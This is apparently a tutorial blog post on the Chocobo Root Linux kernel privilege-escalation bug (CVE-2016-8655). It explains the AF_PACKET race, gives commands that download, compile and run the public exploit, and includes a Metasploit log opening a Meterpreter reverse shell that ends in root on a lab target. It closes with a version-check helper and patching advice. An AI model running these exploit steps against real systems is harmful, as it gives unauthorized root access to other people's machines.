Chocobo Root


The kernel is a core part of an operating system. It links applications running in “user space” to the underlying hardware and allows processes to talk to each other using inter-process communication (IPC). Being monolithic in structure, the Linux kernel also manages hardware, file systems, etc., as well as the CPU, memory and IPC. This breadth of responsibility increases the chance of vulnerabilities being introduced and enlarges the overall attack surface. As the Linux kernel is one of the most popular and widely used open-source kernels, adversaries are always interested in new exploits for it.

What Is Chocobo Root?

The Chocobo Root exploit (CVE-2016-8655) was discovered by Philip Pettersson in 2016. The bug itself was introduced into the Linux kernel in 2011 and patched in 2016. It affected a variety of Linux kernel versions and distributions. Exploit DB hosts C exploit code and a Metasploit module for this vulnerability.
This bug allows a local attacker to run arbitrary commands with administrative (root) privileges or to cause a denial of service.

How Does It Work?

In older kernel versions where unprivileged user namespaces were enabled by default, unprivileged processes were allowed to create AF_PACKET sockets. When a TPACKET_V3 or TPACKET_V2 socket is created, a timer object is initialized, and it is deleted after the socket is closed. The issue is that if the socket version is switched to TPACKET_V1 before the packet_set_ring() function returns, the timer object is never deleted. There is plenty of time for a second core/thread to race and make this change before that function returns. The result is a use-after-free on the timer object; by refilling the freed memory with controlled data (various heap-poisoning techniques), an attacker can make the kernel jump to a modified function pointer once the timer expires.

How to Exploit the Vulnerability?

To recreate and exploit this vulnerability you will need a vulnerable Linux distribution with a downgraded kernel and at least 2 cores/threads. The previously mentioned C code and Metasploit module were tested on Ubuntu 14.04 and 16.04, but the exploit has also been reproduced on Ubuntu 18.04 running a downgraded kernel from 4.4.0 up to, but not including, 4.4.0-53.74.
First, confirm that the target is running a vulnerable kernel version with uname -a or uname -r.

student@server:~$ uname -a
Linux server 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
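As an added example, not part of the original post, the following POSIX shell helper applies the version check above to a uname -r string: it flags Ubuntu 4.4.0 kernels with an ABI number below the 4.4.0-53.74 build the post names as the fix, and it also reports the Ubuntu/Debian kernel.unprivileged_userns_clone sysctl, because the bug is only reachable from an unprivileged process when unprivileged user namespaces are allowed (mainline kernels lack that knob, so "absent" is a normal result there). The function names and the FIXED_ABI constant are my own.

```shell
#!/bin/sh
# Added helper (not from the original post): version and sysctl checks for CVE-2016-8655.
# FIXED_ABI is the ABI number of the Ubuntu build that carried the fix, 4.4.0-53.74.
FIXED_ABI=53

# Returns 0 when an Ubuntu 4.4.0 release string (as printed by `uname -r`,
# e.g. 4.4.0-36-generic) is below the fixed build, 1 otherwise.
kernel_in_vuln_range() {
    rel="$1"
    case "$rel" in
        4.4.0-*) ;;                    # only the 4.4.0 series named in the post
        *) return 1 ;;
    esac
    abi="${rel#4.4.0-}"                # "36-generic"
    abi="${abi%%-*}"                   # "36"
    case "$abi" in
        ''|*[!0-9]*) return 1 ;;       # not a plain ABI number: do not flag it
    esac
    [ "$abi" -lt "$FIXED_ABI" ]
}

# Prints the Ubuntu/Debian sysctl that allows unprivileged user namespaces
# ("1" = allowed, "0" = disabled), or "absent" on kernels without that knob.
# An optional path argument exists only so the lookup can be exercised offline.
userns_clone_setting() {
    f="${1:-/proc/sys/kernel/unprivileged_userns_clone}"
    if [ -r "$f" ]; then cat "$f"; else echo absent; fi
}

check_running_kernel() {
    rel="$(uname -r)"
    if kernel_in_vuln_range "$rel"; then
        echo "$rel: inside the CVE-2016-8655 vulnerable range; update and reboot"
    else
        echo "$rel: not in the 4.4.0 range covered by this post"
    fi
    echo "kernel.unprivileged_userns_clone = $(userns_clone_setting)"
}

check_running_kernel
```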

Once the vulnerable kernel is identified, you can exploit this vulnerability with the previously mentioned C code or Metasploit module.

C Code Usage.

Download or copy the code from Exploit DB, compile it with the GNU C compiler, and run the exploit.

wget -O chocobo_root.c https://www.exploit-db.com/download/40871
gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Wait for the exploit to finish and grant you a root shell.

DO NOT halt the exploitation process while it’s running. Halting the process might crash your kernel.

Metasploit Module Usage.

Open the Metasploit Framework console after checking the target kernel version and create a session. Once the session is established, continue with the following commands:

msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/af_packet_chocobo_root_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.6.1:4444 
[*] Writing '/tmp/.v3yjzy' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
[*] Cleaning up /tmp/.v3yjzy and /tmp/.PRHvmS1zE2..
[*] Sending stage (3012516 bytes) to 192.168.6.2
[*] Meterpreter session 2 opened (192.168.6.1:4444 -> 192.168.6.2:37774) at 2020-07-13 13:55:33 +0000

meterpreter > cd /root
meterpreter > ls -l
Listing: /root
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  3106  fil   2020-07-02 09:19:44 +0000  .bashrc
40700/rwx------   4096  dir   2020-07-13 13:28:11 +0000  .gnupg
100644/rw-r--r--  148   fil   2020-07-02 09:19:44 +0000  .profile
40700/rwx------   4096  dir   2020-07-13 10:42:13 +0000  .ssh
100400/r--------  33    fil   2020-07-13 13:28:11 +0000  flag.txt

You now have root privileges on the target machine and are free to run any command.

How to Mitigate?

This bug was patched fairly quickly after its discovery in 2016. You can find patched kernel versions and additional information on CVE-2016-8655 for some Linux distributions below.

To mitigate this vulnerability, update your kernel and reboot the system by running the following commands (for Debian-based distributions):

sudo apt-get update
sudo apt-get dist-upgrade
sudo reboot

Conclusion

Kernel exploits can be unstable, but they are always powerful. Even though this one was patched, that doesn’t mean you are future-proof. Keep your operating system and kernel up to date.

Further reading: CVE-2016-8655 Linux af_packet.c race condition (local root)

Azar Huseynli